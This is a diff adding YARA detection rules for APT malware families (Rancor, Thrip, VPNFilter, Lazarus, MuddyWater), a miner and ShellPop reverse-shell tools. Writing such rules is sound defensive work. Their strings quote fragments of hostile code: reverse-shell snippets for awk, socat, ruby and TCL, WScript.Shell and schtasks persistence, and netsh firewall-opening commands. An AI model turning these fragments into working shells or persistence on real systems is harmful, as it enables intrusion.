+      tags = "DEMO, FILE, LINUX, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "number of hash blocks to process at a time (don't set or 0 enables automatic selection o" fullword ascii
+      $s2 = "'h' hashrate, 'p' pause, 'r' resume, 'q' shutdown" fullword ascii
+      $s3 = "* THREADS:      %d, %s, aes=%d, hf=%zu, %sdonate=%d%%" fullword ascii
+      $s4 = ".nicehash.com" ascii
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 8000KB and ( 1 of ( $x* ) or 2 of them )
+}
+
+rule APT_RANCOR_JS_Malware_RID2E3E : APT DEMO FILE G0075 MAL T1053 {
+   meta:
+      description = "Detects Rancor Malware"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
+      date = "2018-06-26 11:06:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458"
+      tags = "APT, DEMO, FILE, G0075, MAL, T1053"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ",0,0 >%SystemRoot%\\system32\\spool\\drivers\\color\\fb.vbs\",0,0" fullword ascii
+      $x2 = "CreateObject(\"Wscript.Shell\").Run \"explorer.exe \"\"http" ascii
+      $x3 = "CreateObject(\"Wscript.Shell\").Run \"schtasks /create" ascii
+   condition: 
+      uint16 ( 0 ) == 0x533c and filesize < 1KB and 1 of them
+}
+
+rule APT_RANCOR_PLAINTEE_Variant_RID2FFF : APT DEMO EXE FILE G0075 MAL T1112 {
+   meta:
+      description = "Detects PLAINTEE malware"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
+      date = "2018-06-26 12:21:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31"
+      hash2 = "bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e"
+      tags = "APT, DEMO, EXE, FILE, G0075, MAL, T1112"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "payload.dat" fullword ascii
+      $s3 = "temp_microsoft_test.txt" fullword ascii
+      $s4 = "reg add %s /v %s /t REG_SZ /d \"%s\"" fullword ascii
+      $s6 = "%s %s,helloworld2" fullword ascii
+      $s9 = "%s \\\"%s\\\",helloworld" fullword ascii
+      $s16 = "recv plugin type %s size:%d" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
+}
+
+rule APT_RANCOR_PLAINTEE_Malware_Exports_RID3347 : APT DEMO EXE FILE G0075 MAL {
+   meta:
+      description = "Detects PLAINTEE malware"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
+      date = "2018-06-26 14:41:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d"
+      tags = "APT, DEMO, EXE, FILE, G0075, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.6.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and pe.exports ( "Add" ) and pe.exports ( "Sub" ) and pe.exports ( "DllEntryPoint" ) and pe.number_of_exports == 3
+}
+
+rule APT_RANCOR_DDKONG_Malware_Exports_RID32AC : APT DEMO EXE FILE G0075 MAL {
+   meta:
+      description = "Detects DDKONG malware"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
+      date = "2018-06-26 14:15:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d"
+      tags = "APT, DEMO, EXE, FILE, G0075, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.6.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and pe.exports ( "ServiceMain" ) and pe.exports ( "Rundll32Call" ) and pe.exports ( "DllEntryPoint" ) and pe.number_of_exports == 3
+}
+
+rule APT_Thrip_Sample_Jun18_1_RID2FA2 : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:05:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "59509a17d516813350fe1683ca6b9727bd96dd81ce3435484a5a53b472ff4ae9"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "idocback.dll" fullword ascii
+      $s2 = "constructor or from DllMain." fullword ascii
+      $s3 = "appmgmt" fullword ascii
+      $s4 = "chksrv" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule APT_Thrip_Sample_Jun18_2_RID2FA3 : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:05:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1fc9f7065856cd8dc99b6f46cf0953adf90e2c42a3b65374bf7b50274fb200cc"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" fullword ascii
+      $s2 = "ProbeScriptFint" fullword wide
+      $s3 = "C:\\WINDOWS\\system32\\cmd.exe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 60KB and all of them
+}
+
+rule APT_Thrip_Sample_Jun18_3_RID2FA4 : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:05:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0d2abdcaad99e102fdf6574b3dc90f17cb9d060c20e6ac4ff378875d3b91a840"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\Windows\\SysNative\\cmd.exe" fullword ascii
+      $s2 = "C:\\Windows\\SysNative\\sysprep\\cryptbase.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 60KB and all of them
+}
+
+rule APT_Thrip_Sample_Jun18_5_RID2FA6 : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:06:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "32889639a27961497d53176765b3addf9fff27f1c8cc41634a365085d6d55920"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "c:\\windows\\USBEvent.exe" fullword ascii
+      $s5 = "c:\\windows\\spdir.dat" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule APT_Thrip_Sample_Jun18_6_RID2FA7 : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:06:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "44f58496578e55623713c4290abb256d03103e78e99939daeec059776bd79ee2"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\Windows\\system32\\Instell.exe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+}
+
+rule APT_Thrip_Sample_Jun18_7_RID2FA8 : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:06:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6b714dc1c7e58589374200d2c7f3d820798473faeb26855e53101b8f3c701e3f"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\runme.exe" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 60KB and 1 of them
+}
+
+rule APT_Thrip_Sample_Jun18_8_RID2FA9 : APT DEMO G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:06:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0f2d09b1ad0694f9e71eeebec5b2d137665375bf1e76cb4ae4d7f20487394ed3"
+      tags = "APT, DEMO, G0076"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "$.oS.Run('cmd.exe /c '+a+'" fullword ascii
+      $x2 = "new $._x('WScript.Shell');" ascii
+      $x3 = ".ExpandEnvironmentStrings('%Temp%')+unescape('" ascii
+   condition: 
+      filesize < 10KB and 1 of ( $x* )
+}
+
+rule APT_Thrip_Sample_Jun18_9_RID2FAA : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:06:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8e6682bcc51643f02a864b042f7223b157823f3d890fe21d38caeb43500d923e"
+      hash2 = "0c8ca0fd0ec246ef207b96a3aac5e94c9c368504905b0a033f11eef8c62fa14c"
+      hash3 = "6d0a2c822e2bc37cc0cec35f040d3fec5090ef2775df658d3823e47a93a5fef3"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "a7f0714e82b3105031fa7bc89dfe7664" or pe.imphash ( ) == "8812ff21aeb160e8800257140acae54b" or pe.imphash ( ) == "44a1e904763fe2d0837c747c7061b010" or pe.imphash ( ) == "51a854d285aa12eb82e76e6e1be01573" or pe.imphash ( ) == "a1f457c8c549c5c430556bfe5887a4e6" )
+}
+
+rule APT_Thrip_Sample_Jun18_11_RID2FD3 : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:13:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "590a6796b97469f8e6977832a63c0964464901f075a9651f7f1b4578e55bd8c8"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "\\AppData\\Local\\Temp\\dw20.EXE" ascii
+      $s2 = "C:\\Windows\\system32\\sysprep\\cryptbase.dll" fullword ascii
+      $s3 = "WFQNJMBWF" fullword ascii
+      $s4 = "SQLWLWZSF" fullword ascii
+      $s5 = "PFQUFQSBPP" fullword ascii
+      $s6 = "WQZXQFPVOW" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "6eef4394490378f32d134ab3bf4bf194" or all of them )
+}
+
+rule APT_Thrip_Sample_Jun18_13_RID2FD5 : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:14:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "780620521c92aab3d592b3dc149cbf58751ea285cfdaa50510002b441796b312"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" fullword ascii
+      $s2 = "<member><name>password</name>" fullword ascii
+      $s3 = "<value><string>qqtorspy</string></value>" fullword ascii
+      $s4 = "SOFTWARE\\QKitTORSPY" fullword wide
+      $s5 = "ipecho.net" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "3dfad33b2fb66c083c99dc10341908b7" or 4 of them )
+}
+
+rule APT_Thrip_Sample_Jun18_14_RID2FD6 : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:14:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "67dd44a8fbf6de94c4589cf08aa5757b785b26e49e29488e9748189e13d90fb3"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $s1 = "%SystemRoot%\\System32\\svchost.exe -k " fullword ascii
+      $s2 = "spdirs.dll" fullword ascii
+      $s3 = "Provides storm installation services such as Publish, and Remove." fullword ascii
+      $s4 = "RegSetValueEx(Svchost\\netsvcs)" fullword ascii
+      $s5 = "Load %s Error" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( ( pe.exports ( "InstallA" ) and pe.exports ( "InstallB" ) and pe.exports ( "InstallC" ) ) or all of them )
+}
+
+rule APT_Thrip_Sample_Jun18_10_RID2FD2 : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:13:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "350d2a6f8e6a4969ffbf75d9f9aae99e7b3a8cd8708fd66f977e07d7fbf842e3"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "!This Program cannot be run in DOS mode." fullword ascii
+      $x2 = "!this program cannot be run in dos mode." fullword ascii
+      $s1 = "svchost.dll" fullword ascii
+      $s2 = "constructor or from DllMain." fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( $x1 or 2 of them )
+}
+
+rule APT_Thrip_Sample_Jun18_16_RID2FD8 : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:14:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2b1c1c6d82837dbbccd171a0413c1d761b1f7c3668a21c63ca06143e731f030e"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "[%d] Failed, %08X" fullword ascii
+      $s2 = "woqunimalegebi" fullword ascii
+      $s3 = "[%d] Offset can not fetched." fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( all of them or pe.imphash ( ) == "c6a4c95d868a3327a62c9c45f5e15bbf" )
+}
+
+rule APT_Thrip_Sample_Jun18_18_RID2FDA : APT DEMO EXE FILE G0076 {
+   meta:
+      description = "Detects sample found in Thrip report by Symantec "
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+      date = "2018-06-21 12:14:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "33029f5364209e05481cfb2a4172c6dc157b0070f51c05dd34485b8e8da6e820"
+      hash2 = "263c01a3b822722dc288a5ac138d953630d8c548a0bee080ae3979b7d364cecb"
+      hash3 = "52d190a8d20b4845551b8765cbd12cfbe04cf23e6812e238e5a5023c34ee9b37"
+      tags = "APT, DEMO, EXE, FILE, G0076"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Windows 95/98/Me, Windows NT 4.0, Windows 2000/XP: IME PROCESS key" fullword ascii
+      $s2 = "Windows 2000/XP: Either the angle bracket key or the backslash key on the RT 102-key keyboard" fullword ascii
+      $s3 = "LoadLibraryA() failed in KbdGetProcAddressByName()" fullword ascii
+      $s5 = "Unknown Virtual-Key Code" fullword ascii
+      $s6 = "Computer Sleep key" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule PLEAD_Downloader_Jun18_1_RID2F6A : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects PLEAD Downloader"
+      author = "Florian Roth"
+      reference = "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html"
+      date = "2018-06-16 11:56:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a26df4f62ada084a596bf0f603691bc9c02024be98abec4a9872f0ff0085f940"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%02d:%02d:%02d" ascii fullword
+      $s2 = "%02d-%02d-%02d" ascii fullword
+      $s3 = "1111%02d%02d%02d_%02d%02d2222" ascii fullword
+      $a1 = "Scanning..." wide fullword
+      $a2 = "Checking..." wide fullword
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) or ( 2 of ( $s* ) and 1 of ( $a* ) ) )
+}
+
+rule APT_NK_AR18_165A_1_RID2C15 : APT DEMO EXE FILE MAL NK T1089 {
+   meta:
+      description = "Detects APT malware from AR18-165A report by US CERT"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
+      date = "2018-06-15 09:34:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359"
+      tags = "APT, DEMO, EXE, FILE, MAL, NK, T1089"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=%d action=allow enable=yes" fullword wide
+      $s2 = "netsh.exe firewall add portopening TCP %d \"PortOpenning\" enable" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+}
+
+rule MAL_MuddyWater_DroppedTask_Jun18_1_RID3395 : APT DEMO FILE G0069 MAL {
+   meta:
+      description = "Detects a dropped Windows task as used by MudyWater in June 2018"
+      author = "Florian Roth"
+      reference = "https://app.any.run/tasks/719c94eb-0a00-47cc-b583-ad4f9e25ebdb"
+      date = "2018-06-12 14:54:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7ecc2e1817f655ece2bde39b7d6633f4f586093047ec5697a1fab6adc7e1da54"
+      tags = "APT, DEMO, FILE, G0069, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "%11%\\scrobj.dll,NI,c:" wide
+      $s1 = "AppAct = \"SOFTWARE\\Microsoft\\Connection Manager\"" fullword wide
+      $s2 = "[DefenderService]" fullword wide
+      $s3 = "UnRegisterOCXs=EventManager" fullword wide
+      $s4 = "ShortSvcName=\" \"" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0xfeff and filesize < 1KB and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule APT_Lazarus_RAT_Jun18_2_RID2F03 : APT DEMO EXE FILE G0032 MAL NK {
+   meta:
+      description = "Detects Lazarus Group RAT"
+      author = "Florian Roth"
+      reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
+      date = "2018-06-01 11:39:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e6096fb512a6d32a693491f24e67d772f7103805ad407dc37065cebd1962a547"
+      tags = "APT, DEMO, EXE, FILE, G0032, MAL, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\KB\\Release\\" ascii
+      $s3 = "KB, Version 1.0" fullword wide
+      $s4 = "TODO: (c) <Company name>.  All rights reserved." fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and 2 of them
+}
+
+rule MAL_ELF_VPNFilter_1_RID2D6A : APT DEMO FILE LINUX MAL {
+   meta:
+      description = "Detects VPNFilter malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-05-24 10:30:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f8286e29faa67ec765ae0244862f6b7914fcdde10423f96595cb84ad5cc6b344"
+      tags = "APT, DEMO, FILE, LINUX, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Login=" fullword ascii
+      $s2 = "Password=" fullword ascii
+      $s3 = "%s/rep_%u.bin" fullword ascii
+      $s4 = "%s:%uh->%s:%hu" fullword ascii
+      $s5 = "Password required" fullword ascii
+      $s6 = "password=" fullword ascii
+      $s7 = "Authorization: Basic" fullword ascii
+      $s8 = "/tmUnblock.cgi" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 100KB and all of them
+}
+
+rule MAL_ELF_VPNFilter_2_RID2D6B : APT DEMO FILE LINUX MAL {
+   meta:
+      description = "Detects VPNFilter malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-05-24 10:31:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "50ac4fcd3fbc8abcaa766449841b3a0a684b3e217fc40935f1ac22c34c58a9ec"
+      tags = "APT, DEMO, FILE, LINUX, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)" fullword ascii
+      $s2 = "passwordPASSWORDpassword" fullword ascii
+      $s3 = "/tmp/client.key" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 1000KB and all of them
+}
+
+rule MAL_ELF_VPNFilter_3_RID2D6C : APT DEMO FILE LINUX MAL {
+   meta:
+      description = "Detects VPNFilter malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-05-24 10:31:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0e0094d9bd396a6594da8e21911a3982cd737b445f591581560d766755097d92"
+      hash2 = "9683b04123d7e9fe4c8c26c69b09c2233f7e1440f828837422ce330040782d17"
+      hash3 = "37e29b0ea7a9b97597385a12f525e13c3a7d02ba4161a6946f2a7d978cc045b4"
+      tags = "APT, DEMO, FILE, LINUX, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sx1 = "User-Agent: Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)" fullword ascii
+      $sx2 = "Execute by shell[%d]:" fullword ascii
+      $sx3 = "CONFIG.TOR.name:" fullword ascii
+      $s1 = "Executing command:  %s %s..." fullword ascii
+      $s2 = "/proc/%d/cmdline" fullword ascii
+      $a1 = "Mozilla/5.0 Firefox/50.0" fullword ascii
+      $a2 = "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0" fullword ascii
+      $a3 = "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 1000KB and ( 1 of ( $sx* ) or 2 of ( $s* ) or 2 of ( $a* ) )
+}
+
+rule SUSP_ELF_Tor_Client_RID2DE4 : APT DEMO FILE LINUX SUSP {
+   meta:
+      description = "Detects ELF Linux Tor client"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-05-24 10:51:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "afd281639e26a717aead65b1886f98d6d6c258736016023b4e59de30b7348719"
+      tags = "APT, DEMO, FILE, LINUX, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "We needed to load a secret key from %s, but it was encrypted. Try 'tor --keygen' instead, so you can enter the passphrase." fullword ascii
+      $x2 = "Received a VERSION cell with odd payload length %d; closing connection." fullword ascii
+      $x3 = "Please upgrade! This version of Tor (%s) is %s, according to the directory authorities. Recommended versions are: %s" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x457f and 1 of them
+}
+
+rule HKTL_shellpop_TCLsh_RID2E27 : DEMO HKTL {
+   meta:
+      description = "Detects suspicious TCLsh popshell"
+      author = "Tobias Michalski"
+      reference = "https://github.com/0x00-0x00/ShellPop"
+      date = "2018-05-18 11:02:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9f49d76d70d14bbe639a3c16763d3b4bee92c622ecb1c351cb4ea4371561e133"
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "{ puts -nonewline $s \"shell>\";flush $s;gets $s c;set e \"exec $c\";if" ascii
+   condition: 
+      filesize < 1KB and 1 of them
+}
+
+rule HKTL_shellpop_ruby_RID2E2B : DEMO HKTL {
+   meta:
+      description = "Detects suspicious ruby shellpop"
+      author = "Tobias Michalski"
+      reference = "https://github.com/0x00-0x00/ShellPop"
+      date = "2018-05-18 11:03:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6b425b37f3520fd8c778928cc160134a293db0ce6d691e56a27894354b04f783"
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ");while(cmd=c.gets);IO.popen(cmd,'r'){" ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule HKTL_shellpop_awk_RID2DAC : DEMO HKTL {
+   meta:
+      description = "Detects suspicious AWK Shellpop"
+      author = "Tobias Michalski"
+      reference = "https://github.com/0x00-0x00/ShellPop"
+      date = "2018-05-18 10:41:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7513a0a0ba786b0e22a9a7413491b4011f60af11253c596fa6857fb92a6736fc"
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "awk 'BEGIN {s = \"/inet/tcp/0/" ascii
+      $s2 = "; while(42) " ascii
+   condition: 
+      filesize < 1KB and 1 of them
+}
+
+rule HKTL_shellpop_socat_RID2E83 : DEMO HKTL {
+   meta:
+      description = "Detects suspicious socat popshell"
+      author = "Tobias Michalski"
+      reference = "https://github.com/0x00-0x00/ShellPop"
+      date = "2018-05-18 11:17:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "267f69858a5490efb236628260b275ad4bbfeebf4a83fab8776e333ca706a6a0"
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "socat tcp-connect" ascii
+      $s2 = ",pty,stderr,setsid,sigint,sane" ascii
+   condition: 
+      filesize < 1KB and 2 of them
+}
+
